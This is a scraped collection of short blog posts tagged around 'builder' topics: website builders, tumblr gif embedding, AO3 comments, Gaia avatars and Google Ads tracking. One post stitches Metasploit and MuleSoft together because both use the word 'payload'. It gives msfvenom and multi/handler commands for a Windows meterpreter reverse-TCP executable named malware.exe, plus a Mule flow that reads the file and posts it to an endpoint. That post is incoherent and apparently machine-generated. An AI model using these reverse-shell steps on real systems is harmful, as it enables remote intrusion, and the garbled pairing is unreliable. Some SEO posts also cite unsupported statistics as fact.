#it’s set as urls in the builder
sherwood-cabin · 1 year
does anybody know how to add tiled backgrounds to a neocities website? i’m building off of the layout builder from sadgrl.online n it’s not working
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sheisraging · 1 year
Tutorial: How to Embed Gifs (and get the one you actually want from the set)
There have probably been posts about this before, but since reposting is still a (deeply unfortunate) thing, I figured I'd give this a shot in case it's not a well known trick.
The tumblr Gif tool will allow you to embed gifs directly into your post without saving and re-uploading (reposting) someone else's work.
When you're building your post, just use the yellow GIF icon in the post builder:
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You can search here by tag or keyword. If you happen to know one of the tags used on the original post you're looking for, that can narrow things down:
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To narrow down to a SPECIFIC post, you can also paste the URL into the search field. This will pull up the very first gif in that set:
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If you select that gif, it will pop into your post with a credit and link back to the OP (specifically back to the OPs post with that gif in it):
This is a properly attributed gif embed. The credit on the bottom right points back to the original post:*
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Often, the first gif is not actually the one you want to embed, but there is a way to swap the image out for the one you want without losing the source attribution.
*It's helpful to put some reference text near your initial embed so you're able to swap the right image out later on. For this post, I'm going to use that short block right above the embedded gif as a reference.
In another tab/window, go to the OPs post and find the actual gif you want to embed from their set. Right click the image and Copy Image Address:
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Once you have the URL copied, go back to your post and scroll to the gear icon at the top:
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Open that menu and in the dropdown, where it says Text Editor, swap Rich Text to HTML:
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Your post will turn into a bunch of code once you do this. Don't worry, we will change it back.
For this post, I put reference text above that first embedded gif so I could easily find the URLs I need once it becomes HTML. This is super helpful if you're embedding more than one gif. The reference text is highlighted below. This indicated the block that my currently embedded gif lives in:
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In order to swap the first gif out for one that's later in the set, you just need to replace the SRC gifv and SRCSET gifv URLs with the image address you copied:
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Once you've pasted the image address into these spots, you can go back to the gear icon and switch the Text Editor back to Rich Text:
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Your post should return to it's previous, glorious state, but instead of the first gif embedded, you should now see the one you actually want from the set. The credit and source attribution back to the OPs post should remain intact on the bottom right:
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This might seem super complicated at first, but it's pretty straightforward once you've tried it, and also a lot less frustrating for gif makers to see this than seeing our stuff just get reposted.
Anyway... If you found the gifs outside of tumblr or you didn't make them yourself, don't save and re-upload (aka. repost) them to tumblr, 'cause someone probably stole them from here to begin with and that's not cool. Search the tags and find the ones you want. Reblog from gif makers. If you want to embed a single gif from a set, try to do it this way, or minimally, credit the person you took it from.
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reimenaashelyee · 11 months
I think I've never detailed your website until now, it is incredibly organized! As an artist who knows only the basics of programming and creating webpages, but is very interested in having one, may I ask, what site hosting do you use? or which one do you recommend? i don't really know anything about that. I would love to see the resurgence of the personal website/ blog.
Thank you!! My website and the infrastructure I've built surrounding it is my pride and joy! More and more lately I've come to appreciate the security it's given during these trying internet times.
I use Wordpress and a drag-and-drop builder called Live Composer (I wouldn't recommend it over its competitor, only because Live Composer has very bad documentation). My hosting is SiteGround. All those tools are stuff I adopted 10 years ago, since I started The World in Deeper Inspection. This way of using Wordpress - being accessible but labyrinthe and too-much - suits me, probably because my personality is like this too.
But a lot of people want something simpler. I'd recommend pursuing resources from MelonLand, The Cheapskate's Guide and Sadgrl to get started. They are more for static site generation, of the neocities type. And in their simplicity, they offer you more control compared to my set-up. They are also part of a movement called the Indie Web or Retro Web, which I consider myself a part of mentally and spiritually, if not fully. These are folks who are bringing back blogs, webrings, web surfing, and all the ways that made the internet fun and fresh back then.
If my website seems super organised, it's less about the tools used and more due to the thinking I have developed for it - coming up with an approach of how I want to be presented online, imagining my ideal site experience and implementing it, as well as solving the problem of having both a Professional Site + a Casual Personal Online Home under the same URL. Here's a blog post I made recently about A Personal Website VS A Portfolio, and an older post, Site Revamp + Artist Sites Should Be More Fun Maybe?, that describes my website/internet philosophies. From those two, the main point to take away is that establishing the landing page as a signpost that allows the visitor to choose their destination solved basically my problem of profesional/personal separation.
TLDR I have a lot of thoughts about making artist websites and returning to the independent web!! This has been a 3 years journey for me!!!
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redstringraven · 7 months
hey, @bellathetmntgeckolady, thanks for the tag!! ( •̀ ω •́ )✧ i've not done one of these in a long time, so this'll be fun! i think things like this are nice little community builders; it's a shame not to see them as often.
"the rules of the game are to write one song for every letter in your url, and then tag as many people as there are letters in your url." reposting because those reblog chains get longggg.
also, i made a temporary spotify playlist if that's easier listening.
r - reverence ; hammock e - end of small sanctuary ; akira yamaoka d - dúlaman ; celtic woman s - spanish sahara ; foals t - tsunami ; fløre r - rainy day ; alec holowka i - inner universe ; origa n - no turning back ; olivier deriviere, eric maria couturier g - give a fuck ; tezatalks r - resting grounds ; christopher larkin a - apocalypse ; sleeperstar v - voidfish (plural) ; rachel rose mitchell e - empires ; ruelle n - neglected space ; imogen heap
if you're tagged, no pressure to take part! i'll be tagging a mix of pals and folks i've never tagged before but who seem in my orbit. ...if your @ didn't work, i hope you see this somehow. <xD;;; take care!
@plantdonut, @grozva, @joyfuladorable, @sftgnge, @gatorkid509, @mojimallow, @badatusernames, @vdragon-creations, @adenthemage, @roquog, @maddys-nerd-blog, @yellowhollyhock, @figuringitoutasigoalong, @cheesy-che, @sassatello
because i'm insufferable, i'll also put some small character/song relevant thoughts under the cut. as a treat to myself.
reverence: this song gives me the feeling of being out on casey's farmhouse porch on late summer afternoon or at sunset. everyone's just kind of basking in the warmth, downtime, and company of each other. some might be napping, those awake are making quiet, idle conversation. it's just nice.
end of small sanctuary: this one always makes me think of raph and gwyn, specifically, sitting on city high-point at sunset. much like how it's used in SH3 when heather is just being a teenager at the mall and is probably music she'd listen to, this very much gives me the energy and warmth of raph and gwyn sitting in the setting sun, high above the city, with maybe some food and light conversation. a breath between The Horrors™.
dúlaman: i've been trying to find and listen to more celtic/irish music for a lot of reasons (so if you know any pls gib), but one is to better cultivate the sound and energy of liáfsian folksongs and music.
spanish sahara: how could i make this list without one of the songs that never fails to fuck me up. spanish sahara has been the driving 'score' in my head when it's come to a number of story scenes or character moments due to the slow build and emotional release of the song as well as the lyrics. i dunno. this song just moves and inspires me in ways i can't quite articulate.
tsunami: this song just feels so strongly like aislinn to me. the lost-lover part, sure, but especially the feeling of drowning and just... the instrumentals/vocals feel like her, too. i associate her a lot with water.
rainy day: no specific scenario here, but this score makes me think of and want to draw don or leo. the game it's from kind of has a melancholic nostalgia to it, and the vibe sits well with them.
inner universe: this song is all vibes for me, and it always makes me think of entering the territory of one of the liáfsian dragons and crossing paths with it. specifically the dragon i associate with leo.
no turning back: this score is fully for gwyn being on the run. the title, the strings, the faint ticking clock and building drums toward the end, the urgency throughout. it is, for better or worse, a reflection of what so much of her life has felt like.
give a fuck: sounds and feels like a nyxram song. hard to explain, this one just always makes me think of her.
resting grounds: this score's on my playlist for the liáfsian ruins, which is an area in the realm considered to be cursed ground (but no one knows or remembers why). the ruins are beautiful, peaceful. but you never quite have the sense that you're truly alone.
apocalypse: this song always makes me think of PtINL, i can't really explain why. it's on my personal playlist for the fic, and every time it comes on shuffle it just sends me back into thoughts of mikey, aloy, their travels and their bond.
voidfish (plural): first of all: LOVE the voidfish. second, this is another one of those scores that gives me the energy of encountering ancient liáfsian fae.
empires: this song always makes me think of a 'trailer' for gwyn and ash's arc. i think it's accurate not only for how the final conflict between gwyn, ash and darach will go down, but there's a hint at a much older threat in there and "the tides are turned" being that companionship has been found in the turtles.
neglected space: this song, without fail, always makes me think of and want to draw nyxram. there's something sad, lost and desperate to it.
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thefannishmkp · 11 months
On Kudos, Comments, & Community
(also featuring resources!)
I think there are some basic principles most fannish folk will agree on:
fen share their fanworks for community and interaction
comments are a better way of building community than simply leaving kudos
kudos are a useful low-spoon way to indicate appreciation and positively affect the number of potential future readers
longer, more personalized comments are a better way of building community than very short and generalized comments such as 'thanks for sharing!'
longer, more personalized comments take more time and energy than shorter comments
shorter comments take more time and energy than simply leaving kudos, albeit not by much [n.b. whether this difference is significant is going to depend very much on how many spoons you have to start with!]
more advanced principles that different fannish folk disagree on:
very short and generalized comments such as 'thanks for sharing!' are a better way of building community than simply leaving kudos
very short and generalized comments such as 'thanks for sharing!' feel impersonal and are not helpful for building community
comments consisting entirely of emojis are a cute/fun way of indicating a more personalized level of enjoyment
comments consisting entirely of emojis are disappointing and demoralizing [yes I've seen at least one author beg readers to not do this as they find it so upsetting; no this is not a widespread take]
comments consisting entirely of 'kudos' 'kudos+' 'additional kudos' or similar are a cute/fun way of indicating a reader is re-reading or still reading and enjoying a work
[probably some people also feel weird about additional kudos comments but I haven't actually seen complaints so I'm mentioning it but not listing it as such]
some commonly noted barriers to commenting:
lack of spoons/energy
anxiety over getting a good grade in comment
anxiety over possibly getting a response back
anxiety over possibly not getting a response back
difficulty verbalizing thoughts
difficulty translating thoughts
multi-step process of getting back to the fic url, as the reader downloaded the fic for offline reading
just don't think about it/not in the habit
The best way to get more community interaction between writers and readers, imo, is always going to be minimizing those barriers. Framing it as a requirement of reciprocation has some elements of truth to it, for sure! but I've found that once you start talking about it like an expectation, you get pushback from people who have a knee-jerk reaction to any sort of command, and induce guilt and anxiety paralysis in people who would like to comment but aren't capable of doing so on a regular basis.
So! What can we as readers, writers, and fans in general, do to lower these barriers and improve the quantity and quality of community interaction?
@longlivefeedback is a blog dedicated to discussing just that! Their LLF Comment Project is a really cool initiative for authors that lets them make very clear what kinds of comments/feedback they like and (if applicable) what they dislike. It also as a template suggests authors may want to include a statement about their general policies about responding to comments.
They also have an interactive tool for readers meant to help users learn to comment and lower barriers such as anxiety, mobility, fluency, etc. - the LLF Comment Builder.
There are also a bunch of userscripts various fans have created that make it easier to leave comments! Check out the full set of userscripts I've collected on GreasyFork here:Fandom-Relevant [Archive of Our Own]: For Readers.
A userscript I personally highly recommend is the AO3 automatic rekudos converter - if you've previously left kudos on a fic, and hit kudos again, it converts the button to a question Rekudos? which (when clicked) will randomly generate a comment from a pre-approved list of comments. The script author already included a basic list such as 'kudos+' 'additional kudos'; I personally added some fun ones such as 'but what about SECOND kudos?' and 'a fic so nice, i kudosed it twice!'.
The reason I so highly recommend this one is because I a) read a lot of WIPs and b) re-read fics so often - this lets me very quickly let people know I've re-read their fic yet again or am continuing to read their ongoing saga!
I've found over time as I have more and more strictly followed a policy of rekudosing any fic I've already kudosed, I've actually found it easier to leave free-form ad hoc comments as well! YMMV there, of course.
Other notable userscripts:
AO3 Random Nice Comments
ao3 Comment Assist
AO3: Add gifs to comments
AO3 Floating Comment Box
AO3: Comment Formatting Options
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gaiatan · 3 months
What the heck is a ghost?
Ghosting is the act of making avatars for other users. This usually happens in the dressing room, a sub of the avatar talk thread (but sometimes you'll see it in the main AT thread or chatterbox)
Old farts (like me) might remember Tektek, which was similar in that you could make avis for people using its dream avatar simulator
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but tektek is dead now! so what do you use?
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why gaia's own avatar builder! now i cant say this thing is great....in fact a lot of people hate it but its all we got (unless you wanna build inside the normal avatar function) you can also change its layout with gaiaupgrade if you have it
At the top you'll see the Ghost? button, this lets you open a lil box you can type in someone's Ghost ID (the numbers on your profile url are your id) or their username (new-ish feature!) and then BAM you have their lil avatar (provided they have ghosting turned on, remember if you're asking for a ghost to make sure its on! or to let someone know that its not on if you want to ghost them and theyre asking for them)
there's three inventory options from here
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Item DB: this is every SINGLE item that is on gaia and in the avatar builder, this does include items you cannot get as they've either never been released or are limited to like...one person and whoever they give them out to (so good luck if you're using this as an actual way to find new items)
My Inventory: this is items YOU own, this will be the only other option if you are not actively ghosting someone (which means the default avi will be you) this could be a good way to find items you know that the person you're ghosting doesnt have
Ghost User Inventory: this will only show up once you're actively ghosting someone, make sure to check you're on this if they request to ONLY use their own items! now you can see every item they own! (provided its for the base they're currently using, ie you wont see any paw items for human bases)
You finished the ghost now what?
navigate to the bbc code area, pick the option that fits their base and then copy and paste the code into a reply in the thread you're showing the ghost off to. mind you the image only is hosted for a limited time (the list will always be there) so if you need to keep the image you might want to save it somewhere!
How do i ask for a ghost?
You want a new avatar but you're stumped, maybe you really want to cosplay your oc or a character but you're stuck! or maybe you have a challenge for someone!
You have two main options
make a new thread: go to the board of your choice, usually the dressing room but hey if you wanna post in CB go ahead. state what you're looking for, if you want it to be strictly your own items or not (and if not if you have a budget or not), and as many details as you want. dont care? tell em to go nuts. have extremely specific needs and hate most avis people make? give htem as much info as you can and try to provide previous avis if you can (or avis you're inspired by)
you can also tack this onto your closet thread if youve made one (or whatever fitting thread if you're hosting a contest or something)
look for someone's ghosting shop: these are threads that people will run where they ghost other people, usually for a fee (more on that in a second) or for free (they also might not be really stated to be a shop they might just wanna ghost you or its a ghost for ghost thread)
I can get paid?
Ya sure can! and you can pay others as well! How much you pay is really...up to you as there's not really a set price on what people pay for ghosts. I've gotten anything from the mithril coins, a couple grand, to nearly 100k for avatars. you also can send wishlist items, items you dont want (some people ghost to get rid of items), just the tipping button (which i believe goes up to 1k?), to gcash, and even art
you also...dont have to. some people do ghosts for free
now go out there and haunt people i mean make avis for them or get avis made for you
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mulemasters · 3 months
Metasploit: Setting a Custom Payload Mulesoft
To transform and set a custom payload in Metasploit and Mulesoft, you need to follow specific steps tailored to each platform. Here are the detailed steps for each:
Metasploit: Setting a Custom Payload
Open Metasploit Framework:
Select an Exploit:
use exploit/multi/handler
Configure the Payload:
set payload <payload_name>
Replace <payload_name> with the desired payload, for example: set payload windows/meterpreter/reverse_tcp
Set the Payload Options:
set LHOST <attacker_IP> set LPORT <attacker_port>
Replace <attacker_IP> with your attacker's IP address and <attacker_port> with the port you want to use.
Generate the Payload:
msfvenom -p <payload_name> LHOST=<attacker_IP> LPORT=<attacker_port> -f <format> -o <output_file>
Example: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe -o /tmp/malware.exe
Execute the Handler:
Mulesoft: Transforming and Setting Payload
Open Anypoint Studio: Open your Mulesoft Anypoint Studio to design and configure your Mule application.
Create a New Mule Project:
Go to File -> New -> Mule Project.
Enter the project name and finish the setup.
Configure the Mule Flow:
Drag and drop a HTTP Listener component to the canvas.
Configure the HTTP Listener by setting the host and port.
Add a Transform Message Component:
Drag and drop a Transform Message component after the HTTP Listener.
Configure the Transform Message component to define the input and output payload.
Set the Payload:
In the Transform Message component, set the payload using DataWeave expressions. Example:
%dw 2.0 output application/json --- { message: "Custom Payload", timestamp: now() }
Add Logger (Optional):
Drag and drop a Logger component to log the transformed payload for debugging purposes.
Deploy and Test:
Deploy the Mule application.
Use tools like Postman or cURL to send a request to your Mule application and verify the custom payload transformation.
Example: Integrating Metasploit with Mulesoft
If you want to simulate a scenario where Mulesoft processes payloads for Metasploit, follow these steps:
Generate Payload with Metasploit:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe -o /tmp/malware.exe
Create a Mule Flow to Handle the Payload:
Use the File connector to read the generated payload file (malware.exe).
Transform the file content if necessary using a Transform Message component.
Send the payload to a specified endpoint or store it as required. Example Mule flow:
<file:read doc:name="Read Payload" path="/tmp/malware.exe"/> <dw:transform-message doc:name="Transform Payload"> <dw:set-payload><![CDATA[%dw 2.0 output application/octet-stream --- payload]]></dw:set-payload> </dw:transform-message> <http:request method="POST" url="http://target-endpoint" doc:name="Send Payload"> <http:request-builder> <http:header headerName="Content-Type" value="application/octet-stream"/> </http:request-builder> </http:request>
Following these steps, you can generate and handle custom payloads using Metasploit and Mulesoft. This process demonstrates how to effectively create, transform, and manage payloads across both platforms.
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vrhermit · 1 year
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nerdyladypolice · 2 years
WordPress vs. Squarespace Comparison
  WordPress Vs. Squarespace:  
When it comes to choosing between Squarespace and WordPress, first and foremost, it is crucial to know about the two options. So, here is an introduction to both website builders in short.  Squarespace is a SaaS or a Software as a Service. This tool is readily suited for beginners and has an all-in-one design. It was created for users who want to pay just a single amount as a fee to have access to almost anything on the website. The monthly subscriptions for Squarespace include site management, plugins, templates, and more. The overall site is pretty user-friendly and has options for hosting. Also, there are no coding requirements, so this seems to be an ideal site for beginners without experience in coding.  WordPress is another very popular SaaS platform that is hosted and has been designed specifically for beginners. There are customizable features on the WordPress site, so it is very beneficial for people who want to create and maintain smaller blogs and websites most efficiently. One of the best things about the website-building tool is that there is a free option for those who want to get some practice before signing in with the right deal. Apart from that, there are paid plans with other stellar features and add-on options. 
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Choosing Between the Two: Which One is Better? 
It is important to remember that WordPress and Squarespace provide website creation options for users. These sites offer tools, templates, and other features to simplify the process of website creation. Also, you don't require any coding knowledge to operate both sites. However, the experience of building a website with both tools is completely different. To ensure that you have a great experience in creating your site, it is important to choose the correct platform. You can also Hire a Professional Website Developer in the USA for services. However, if you want to make your own choices and set up your website, you have to choose between the two. 
Stacking Up the Platforms Together: A Detailed Comparison 
Ease of Use  
When it comes to ease of use, this site is elementary and ideal for beginners. You don’t have to learn coding to use the tool and create your website. 
WordPress might be a bit more challenging to operate than Squarespace if you have no experience. Although no coding experience is required on this site, there is a steep learning curve, and you will have to know some basics about operating the tool and creating your website or blog. 
SEO Options 
In Squarespace, you will receive essential meta-descriptions and customized URLs for different pages. Another great thing is that you can access Google Analytics no matter what plan you choose in this fantastic website builder. 
Users using the free version might not have access to the SEO tools and options. However, for users with an eCommerce plan or Business Plan, there are different 3rd party plugins for them to install to maximize the SEO section of their website. 
This website builder has essential in-built blogging tools, making the blogging process easy. You can choose from various tools such as Post Scheduling Tags, Comment Moderation, Categories, and much more. 
There is a free plan in WordPress where the users will be provided with the critical blogger options for beginners, 3GB storage and a hosted site. However, with the paid plans, there are other options for blogging, such as customization options and much more. 
Plan Costs 
$12-$40 per month 
$4-$45 per month 
Customer Support 
  In the case of customer support, there are various options available for users to choose from. For example, one can get 24/7 help via social media, live chat, and email. However, there is no phone option available for the users in Squarespace. 
The customer support section for free WordPress users includes limited phone support. However, one-on-one concierge and live chat options will be made available to users once they have chosen a particular plan for themselves. 
eCommerce Options  
The users of Squarespace will be able to sell both digital as well as physical products on the website created using this tool. Apart from that, they can sell services on the site too. 
  The users with an eCommerce plan can sell physical and digital products in their store. There are other plans, but these do not allow the creation of online stores. For other users, only the blogging option is available. 
Storage and Backup 
The storage space is unlimited for users. But they will have to back their data and website content manually as no auto-upload feature is available on this website builder.                                                   
In the case of WordPress, the website content is automatically and adequately backed up. Also, users have different storage space options, and the amount of storage depends on your chosen payment plan. 
To read more technical blogs visit QServices.
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amangotogroww · 3 days
How Does Tracking Work on Google Ads?
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In today's digital marketing landscape, understanding how your advertising campaigns perform is crucial for optimizing efforts and maximizing return on investment (ROI). Google Ads offers robust tracking tools that enable marketers to measure success accurately and make informed decisions. In this blog, we'll explore how tracking works in Google Ads, its key components, best practices, and tips for effective utilization.
1. Understanding Google Ads Tracking
Google Ads tracking is the process of collecting and analyzing data related to ad performance, user interactions, and conversion metrics. With this information, advertisers can refine their strategies, enhance audience targeting, and improve campaign effectiveness.
2. Key Components of Google Ads Tracking
a. Conversion Tracking
Conversion tracking is a fundamental aspect of Google Ads. It allows advertisers to measure specific actions users take after interacting with their ads, such as:
Purchases: Understanding sales generated through ads.
Sign-Ups: Tracking newsletter subscriptions or account creations.
Form Submissions: Monitoring contact form completions.
Fact: According to Google, advertisers using conversion tracking see an average increase of 20% in conversions.
How to Set Up:
Go to "Tools and Settings" in your Google Ads account.
Select "Conversions" and create a new conversion action.
Implement the conversion tracking tag (pixel) on your website.
b. Google Analytics Integration
Integrating Google Analytics with Google Ads provides deeper insights into user behavior. By linking these platforms, you can:
Analyze metrics like bounce rate, session duration, and page views.
Gain insights into audience demographics and interests.
Track user pathways from ad click to final conversion.
Tip: Make sure to set up goals in Google Analytics that align with your conversion actions in Google Ads for comprehensive tracking.
c. Tracking URL Parameters
URL parameters allow advertisers to track the performance of specific campaigns, ad groups, or keywords. By appending tracking parameters to your destination URLs, you can gather detailed information about how users arrived at your site.
Common Parameters:
utm_source: Identifies the source of traffic (e.g., Google, Facebook).
utm_medium: Indicates the medium used (e.g., CPC, email).
utm_campaign: Defines the campaign name for tracking.
Trick: Use Google’s Campaign URL Builder to easily create tagged URLs.
3. Advanced Tracking Features
a. Remarketing Lists for Search Ads (RLSA)
RLSA allows you to tailor your search ads for users who have previously visited your website. By tracking user behavior, you can create specific audience segments and adjust your bidding and messaging accordingly.
Fact: Businesses using RLSA see an average conversion rate increase of 50%.
b. Enhanced Ecommerce Tracking
For e-commerce websites, Enhanced Ecommerce tracking provides in-depth insights into the shopping behavior of users. It tracks product impressions, clicks, add-to-cart actions, and more.
Tip: Implement Enhanced Ecommerce tracking to analyze user behavior at each stage of the buying process.
4. Analyzing and Interpreting Data
Once your tracking is set up, analyzing the data is crucial for understanding campaign performance. Focus on key metrics:
Click-Through Rate (CTR): Measures how often people click your ad after seeing it. A higher CTR indicates effective ad copy and targeting.Tip: Test different ad copy and visuals to find what resonates with your audience.
Cost per Acquisition (CPA): Calculates how much you spend to acquire a customer. Aim to lower your CPA while maintaining conversion rates.
Conversion Rate: The percentage of users who complete a desired action after clicking your ad. A higher conversion rate suggests effective targeting and ad relevance.
Return on Ad Spend (ROAS): Measures the revenue generated for every dollar spent on ads. A higher ROAS indicates a successful campaign.
Fact: Advertisers should aim for a ROAS of at least 400% (or a 4:1 ratio) to ensure profitability.
5. The Importance of Google Ads Tracking
Effective tracking in Google Ads is essential for several reasons:
Informed Decision-Making: Understanding which ads and keywords perform best allows for better budget allocation.
Optimization Opportunities: Tracking helps identify underperforming ads, keywords, or targeting options, enabling marketers to refine their strategies.
ROI Measurement: Knowing the ROI of your campaigns helps justify your advertising spend and demonstrates the value of your marketing efforts.
6. Best Practices for Google Ads Tracking
Regularly Review Your Data: Set a schedule to review performance data and adjust your campaigns accordingly.
A/B Testing: Continuously test different ad elements (headlines, descriptions, images) to identify the most effective combinations.
Use Automated Rules: Google Ads allows you to set automated rules for adjusting bids, pausing ads, or changing budgets based on performance metrics.
Keep Your Tags Organized: Use descriptive names for conversion actions and tracking parameters to maintain clarity as your campaigns grow.
Google Ads tracking is a vital component of successful digital marketing. By implementing conversion tracking, integrating Google Analytics, and utilizing advanced tracking features, marketers can gain valuable insights into their campaigns' performance. This data-driven approach enables informed decision-making, optimization, and ultimately, better ROI. To implement effective SEO strategies for long-term growth, visit GoToGroww.com and connect with me to explore how we can elevate your business.
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themesfores · 6 days
MyThemeShop Coupon v2.2.3 WordPress Theme
https://themesfores.com/product/mythemeshop-coupon-wordpress-theme/ MyThemeShop Coupon v2.2.3 WordPress Theme Coupon WordPress Theme is a beautiful and professional theme built from the ground up for the coupon business. Impress your visitors and convert more sales with this highly professional and fully customizable theme. Note: Please signup for a free account at MyThemeShop and login via the same details on your website. MyThemeShop Coupon WordPress Theme Footer Settings – Enable Footer Widgets – Enable 3 or 4 Widget Layout – Choose Footer Background – Enable Parallax on Footer BG – Extra Footer Text – Footer Text Title – Footer Text Content – Footer Social Icons – Footer Social Icon Title – Footer Social Icons – Section for Copyrights Text – Copyright’s Background Homepage Settings – Layout Manager – Carousel Section Title – Carousel Itmes – Show Carousel on Other Pages – Setup a Custom Slider – Set The Animation Effect for Slider – Background for Slider Text – Enable Parallax Effect for Slider – Add Coupon Category Tabs – Choose Number of Posts – Set Background Color for Tabs – Enable Parallax Effect for Tabs – Enable Social Icons for Homepage – Add Section Title – Set Section Title Color – Add Social Media Icons – Store Section Title – Add Popular Store Items – Set Store Background Color – Set Subscribe Background Color – Sign Up Section Background – Sign Up Title – Sign Up Title Color – Sign Up Button – Sign Up Button Background Color – Sign Up Button Text – Sign Up Button URL Coupon Archive – Set default coupon archive tile – Set Small Description – Set Number of Coupons – Choose Coupon Archive Sidebars – Exclude Expired Coupons – Coupon Archive Post Meta Info – Pagination Type – Coupons Archive Coupon Single – Coupon Single Post Layout – Coupon Single Post Meta Info – “Show Coupon” Button Action – Subscribe Box in Popup Blog Settings – Featured Categories – Pagination Type – Posts on blog pages – Blog Post Meta Info – Date Formate Style – Enable Lightbox Single Post Settings – Single Post Layout Builder – Choose Meta Info to Show – Enable or Disable Breadcrumbs – Highlight Author Comment – Date in Comments Social Settings – Social Sharing Buttons Position – Social Sharing Buttons on Pages – Organizer Social Media Buttons Ad Management – Below Post Title Ad – Show Ads After XX Days – Ad Section for Below Post Content Sidebar Settings – Create Custom Sidebars – Choose Sidebar for Homepage – Create Single Post Sidebar – Choose Sidebar for Single Pages – Create “Archive Page” Sidebar – Tag Archive Sidebar Selection – Date Archive Sidebar Selection – Different Sidebar for Author Archive – Different Sidebar for Search Pages – Sidebar for 404 Error Page – Different Sidebar for Shop Pages – Create a New Sidebar for Single Product Pages https://themesfores.com/product/mythemeshop-coupon-wordpress-theme/ #WooCommerceTheme #WordpressTheme
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speed-seo · 21 days
Dynamic UTM Parameters Google Ads: A Step-by-Step Guide
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Using dynamic UTM parameters in your Google Ads campaigns can provide invaluable insight into your marketing performance. This guide will walk you through everything you need to know to implement dynamic UTM tracking. What are Google Ads Dynamic UTM Parameters? UTM parameters are tags added to the end of a URL to track the effectiveness of marketing campaigns and identify the source of website traffic. They provide valuable insights into how users interact with your ads and website. Dynamic UTM parameters take this a step further by automatically pulling information from your Google Ads account to populate customized UTM tags. This eliminates the need to manually update UTM parameters every time you make a change in your campaigns, saving you time and reducing the risk of errors. Some examples of dynamic UTM parameters include: - {campaignid} - Automatically inserts the campaign ID - {adgroupid} - Automatically inserts the ad group ID - {keyword} - Automatically inserts the keyword Benefits of Dynamic UTM Parameters Here are some of the key benefits of using dynamic UTM parameters: - Simplified tracking - With dynamic parameters, you don't have to continually update UTM tags every time you tweak campaigns. The tags automatically stay up-to-date. - Deeper insight - Dynamic parameters give you visibility into campaigns, ad groups, keywords, and other levels of data directly in your analytics platform. - Enhanced reporting - You can easily filter and segment your analytics data by the UTM parameters to see how different elements of your campaigns are performing. - Optimised campaigns - The granular data from dynamic UTMs enables you to identify low-performing areas and optimise your Google Ads campaigns accordingly. How to Create Google Ads Dynamic UTM Parameters Follow these steps to implement dynamic UTM tracking: Step 1: Enable Dynamic Parameters at Account Level First, you need to enable dynamic parameter substitution at the account level in your Google Ads settings: - Navigate to Account Settings - Under Auto Tagging, check the box for Tag the URL that people click through from my ad. Step 2: Create a Tracking Template Next, create your tracking template under Campaigns > Tracking > Tracking Templates in your Google Ads account. Click + to create a new tracking template and give it a name that describes the dynamic parameter(s) you want to use. Which campaigns require you to add manual tags to destination URLs for tracking According to the industry common practices, the campaigns that require manual tags on destination URLs for tracking are: - Social media campaigns - Email marketing campaigns - Pay-per-click (PPC) advertising campaigns - Affiliate marketing campaigns - Content marketing campaigns - Event marketing campaigns You can use the Analytics URL builders to construct your URLs with manual tags. If you use manual tagging and auto-tagging together, then the source, medium, and other traffic-classification dimensions use the auto-tagged values. The manually tagged values for utm_content and utm_term are used for the Manual Ad Content and Manual Term dimensions. Google Ads UTM Parameters List Parameter Short Description Long Description {adgroupid} Ad group ID Inserts the specific ID number assigned to the ad group that served the ad. This allows you to filter analytics data by ad group. {campaignid} Campaign ID Inserts the specific ID number assigned to the campaign that served the ad. This allows you to filter analytics data by campaign. {creative} Ad creative ID Inserts the specific ID number assigned to the particular ad creative variant that was shown. This allows you to see performance for each version of an ad. {device} Device type Inserts the general category of device the ad was served to, such as mobile, tablet, desktop, wearable, etc. Useful for seeing device performance. {devicemodel} Device model Inserts the specific model name of the device the ad was served to, like iPhone X, Samsung Galaxy S10, etc. Allows more granular tracking by device model. {extensionid} Extension ID Inserts the specific ID number of any extension attached to the ad, like call, app, sitelink, etc. Allows you to identify impact of specific extensions. {feeditemid} Feed item ID For shopping ads, inserts the specific ID number of the product feed item that was advertised. Can be used to track performance by product. {gclid} Google click ID Inserts the unique ID string Google assigns to each ad click for tracking purposes. Allows connecting Google Analytics data to Google Ads. {ifcontent:} Ad content parameter Inserts a specified value if the ad uses a particular format like video, image, etc. Can be used to track performance by creative content. {ifmobile:} Mobile device parameter Inserts a specified value if the ad was served to a mobile device. Useful for tracking mobile vs desktop performance. {ifnotmobile:} Non-mobile device parameter Inserts a specified value if the ad was NOT served to a mobile device. Useful for tracking mobile vs desktop performance. {ifsearch:} Search ad parameter Inserts a specified value if the ad was a search ad. Helpful for tracking search vs display ad performance. {keyword} Keyword Inserts the specific keyword that triggered the ad to be shown. Enables filtering data by keyword performance. {loc_interest_ms} Location intent ID Inserts the ID number of a geographic intent audience the ad targeted, like "people interested in X". Allows tracking by location targeting. {loc_physical_ms} Location ID Inserts the ID number of a physical location the ad targeted. Useful for location-based tracking. {matchtype} Match type Inserts the match type of the keyword that triggered the ad, like broad, phrase, exact, etc. Allows analysis by match type. {network} Network Inserts the specific network the ad was served on - Google Search, Display Network, Search Partners, etc. Allows performance comparison across networks. {param1} Custom parameter 1 Inserts the value of a custom parameter you define. Useful for adding campaign names, promo codes, etc. {param2} Custom parameter 2 Inserts the value of a second custom parameter you define. Useful for adding campaign names, promo codes, etc. {placement} Placement ID For display ads, inserts the ID of the specific site, page, or app the ad appeared on. Enables tracking by placement. {random} Random number Inserts a random numeric value. Can be used to add randomness to parameter values. {targetid} Target ID Inserts the ID number of the targeted audience, keyword, placement, etc. the ad used. Allows segmenting data by targeting. {target} Target Inserts the text of the targeted audience, keyword, placement, etc. the ad used. Allows segmenting data by targeting. Made for you: The Best Tracking Template to Use in Your Google Ads Campaigns:{lpurl}?utm_source=google&utm_medium=cpc&utm_campaign=spring_sale&utm_term={adgroupid}-{keyword}-{matchtype}&utm_content={creative}This tracking template inserts the LP URL, followed by UTM parameters for source, medium, campaign, term (using ad group ID, keyword, and match type), and content (using the creative ID). Google Ads Tracking Template Generator While manually creating tracking templates offers flexibility, Google provides a helpful tool to streamline the process: the Google Ads tracking template generator. This tool allows you to easily build customized tracking templates by selecting the desired parameters and campaign information. Key benefits of using the generator: - User-friendly interface: The generator simplifies the creation of tracking templates, even for those less familiar with UTM parameters. - Pre-populated options: The tool offers pre-populated options for common UTM parameters, making it easy to select the relevant ones for your campaigns. - Real-time preview: You can see a real-time preview of your tracking template as you build it, ensuring accuracy before implementation. - Error checking: The generator includes built-in error checking to help identify and correct any syntax issues in your template. How to access the generator: - Visit the Google Ads tracking template generator page. - Select the desired parameters and campaign information. - Preview your tracking template 